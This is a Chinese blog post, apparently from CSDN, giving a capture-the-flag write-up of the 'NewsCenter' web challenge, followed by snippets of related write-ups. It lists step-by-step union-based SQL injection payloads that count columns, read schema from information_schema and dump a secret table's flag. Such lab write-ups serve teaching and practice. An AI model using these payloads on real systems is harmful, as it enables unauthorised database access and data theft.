攻防世界 适合做桌面_攻防世界-NewsCenter

最新推荐文章于 2024-05-13 13:08:12 发布
最新推荐文章于 2024-05-13 13:08:12 发布
阅读量162 收藏
点赞数
文章标签: 攻防世界 适合做桌面
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39826089/article/details/111860147
版权

打开实验环境:

输入 1 回显是这样的:

输入 1'  回显:

尝试构造pyload:   1' order by 3#

再次尝试构造pyload:  1' order by 4#

猜测是 单引号过滤,当前数据表 列数 为 3 , 构造 pyload 差数据库名:    1' union select 1,database(),'3

当前数据库名为 : news

构造pyload 取表名:

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),'3

构造pyload取 secret_table 表的字段:

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='secret_table'),'3

构造pylaod 取值:

1' union select 1,(select group_concat(id,0x7e,fl4g) from secret_table),'3

拿到 flag:QCTF{sq1_inJec7ion_ezzz}

总结:这题没什么过滤,很正常的一个SQL语句爆表的过程吧!

题外话:在之前写过 BUUCTF的随便注,在那里提到过 用 mysql.innodb_table_stats 或 mysql.innodb_index.stats 代替 information_schema.tables

在这里测试了,没有成功;可能是这个环境下 这个 表不存在吧;

weixin_39826089
关注
【XCTF】GFSJ0010:适合作为桌面
0leg的博客
07-28 1999
这看起来虽然是一道简单的图片隐写题,但后续涉及到python的编译与反编译,需要一定编程基础。
攻防世界-NewsCenter
weixin_46784800的博客
11-12 1529
攻防世界-NewsCenter题 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。 首先,通过order语句,判断查询
[CTF-Misc攻防世界]适合作为桌面
最新发布
2302_76688540的博客
05-13 448
发现flag是py文件,那么应该是使用了py编译,那我们将其保存下。发现一串十六进制的密码,那我们使用010创建新文件。我们使用stegsolve去查看这个图片。发现二维码,我们使用CQR来查看图片。下载uncompyle6模块。我们下载后解压,查看图片。打开保存文件,查看文件。
攻防世界 适合作为桌面
qq_42201260的博客
10-08 429
下载完附件,打开一张图片。。丢到Stegsolve.jar看看,发现有个二维码,那微信扫下,有一串16进制数字 丢到winhex里另纯为成.pyc文件,进行反编译下,就得到python代码,跑下就有flag值了 ...
攻防世界适合作为桌面
淡巴枯的博客
10-08 1140
【代码】攻防世界适合作为桌面
攻防世界---misc---适合作为桌面
2201_75556700的博客
04-15 474
4.用winhex转为pyc文件,先把十六进制内容存放在.txt文本中,然后用winhex打开.txt。右键,选择编辑,选转换选块,选十六进制ASCLL->二进制,存为.pyc文件。2.用Stegsolve打开,打开图片一直点击下面的“>”,知道看到二维码。3.用QR Research解码,得到一串十六进制。7.使用pycharm运行脚本,得到flag。6.把该代码下载下来,修改一下,如下。1.下载附件,是一张图片。
攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 395
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:user@10.42.101.146 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来...
攻防世界web
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界】七、NewsCenter
Hi~ 土拨鼠
09-13 468
步骤 打开所给场景: 发现一个输入框,试一下有没有sql注入,使用burp进行抓包(不知道什么原因使用hackbar提交数据页面没变化,卡了好久): 发现单引号'会出现错误,继续进行注入:1' or 1=1 # 发现页面正常,尝试一下联合查询:order by 3/4 判断字段数为3,继续注入: payload:1' union select 1,2,3 # 发现有回显,联合查询可用!接下来就是按照库表列的顺序依次进行查询: payload:1' union select 1,database.
攻防世界-misc】适合作为桌面
weixin_73625393的博客
11-23 469
只截图二维码区域,用工具QR Research打开截图二维码,进行解码,如果不成功多次尝试,截图二维码,原因是因为图片中的三个大方块不清晰。会有这两个文件,点击上方文件,将它拷贝到虚拟机Windows7中,或者电脑上可以运行py脚本,直接运行就行。将字符复制到中间区域后,在右边可以看到有这个py和pyt文件,看到有pyt的话,可以知道。看到这个的话,可能需要用pyc反编译来解题,将文件另存为2.pyc至桌面,,将文件上传到该平台,得到一个py脚本,下载该文件,并解压至桌面,大小选择1就行,点击确定。
攻防世界 Misc 适合作为桌面
MrTreebook的博客
03-12 1411
攻防世界 Misc 适合作为桌面1.binwalk看是否有隐藏文件2.StegSolve打开3.WinHex保存为pcy文件4.得到flag 1.binwalk看是否有隐藏文件 2.StegSolve打开 发现有一张二维码 在线扫描 03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000000430000007378
攻防世界-Misc-适合桌面__题目解析
m0_69379426的博客
08-08 4402
首先公布一下答案: 名称: 适合作为桌面编号: GFSJ0010难度:1题目来源:题目描述: flag格式为flag{xxxx}题目附件:单纯从图片观察,未发现线索;右键使用记事本打开,依然未发现 字样;图片隐写:在ctf比赛中,misc方向是必考的一个方向,其中,图片隐写也是最常见的题目类型启动 ,加载图片; stegsolve需要依赖Java环境,自行配置,下载下了的文件为jar,目录下cmd的输入 java -jar jar文件名 切换图片->,
【愚公系列】2021年11月 攻防世界-进阶题-MISC-048(适合作为桌面)
热门推荐
时光隧道
11-28 3万+
文章目录一、适合作为桌面二、答题步骤1.stegsolve2.winhex3.uncompyle6总结 一、适合作为桌面 题目链接:https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=1&page=3 二、答题步骤 1.stegsolve 2.winhex 这里都是十六进制,然后我们把他复制到 winhex 中,发现是 pyc 编译文件 3.uncompyle6 uncompyle6进行文件反编译
攻防世界 MISC 适合作为桌面 题解
YUK_103的博客
11-24 1973
就给了你一张图片。。。 思路 首先放入winhex中看看有没有什么信息,未果。 其次放入kali中用binwalk分析,未果。 最后放入隐写神器Stegsolve中翻着翻着突然发现了这个: 扫一下出现了一个字符串: 思路:我看这个字符串像文件16进制,所以复制放入winhex中得: 我再一查那个文件头:pyc,那么我们就把他改成.pyc文件。 但是pyc毕竟是pyc,看不到源码啊,怎么办呢?...
【XCTF】【GFSJ0010】【Misc】【难度1】适合作为桌面
新青年1号
07-18 3189
【XCTF】【GFSJ0010】【Misc】【难度1】适合作为桌面
[XCTF]适合作为桌面(难度1)
Mr_Fmnwon的博客
10-30 6048
给了一张图片(png),什么提示没有,怎么进行思考获得flag?事实上,真实的场景自然也不会给出任何提示。这就考察了图片隐写的几个角度,即,给你一张图片,你一般可以按照什么顺序,检查图片的哪些方面。作为萌新,其实对解题的固定顺序步骤以及思考方式是很看重的。本题看了好多wp,但是连其中的一个知识点、工具都不明白,所以又大量查阅了各种博客、下载了各种软件,力求掌握。希望能细无巨细地讲述清楚题地整个过程,以适用于其他题目。用到了很多知识,下载了很多软件,浏览了很多加解密网站,收获颇丰。只是(难度1?)
【misc | CTF】攻防世界 适合作为桌面
weixin_46301214的博客
01-27 705
看后缀名知道是 .pyt文件,是Python编译后的东西,所以就采用反编译,看看源代码是什么。可能只能靠联想,靠经验,脑洞了吧。查了一下,发现只有 .pyc 这个东西,是一个编译后的二进制文件格式。再了解会发现其实隐写术有很多种,可以通过像素,光影,颜色等隐血进去。拿到这张图片,不可能扔进ps会有多图层,普通图片也就一个图层而已。有点古典密码学的味道了,不知道解密算法的情况下应该是不可能破解的。调整隐写样式,其中会有一个二维码是能扫出来的。自己new一个大小,粘贴进去,选择16进制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值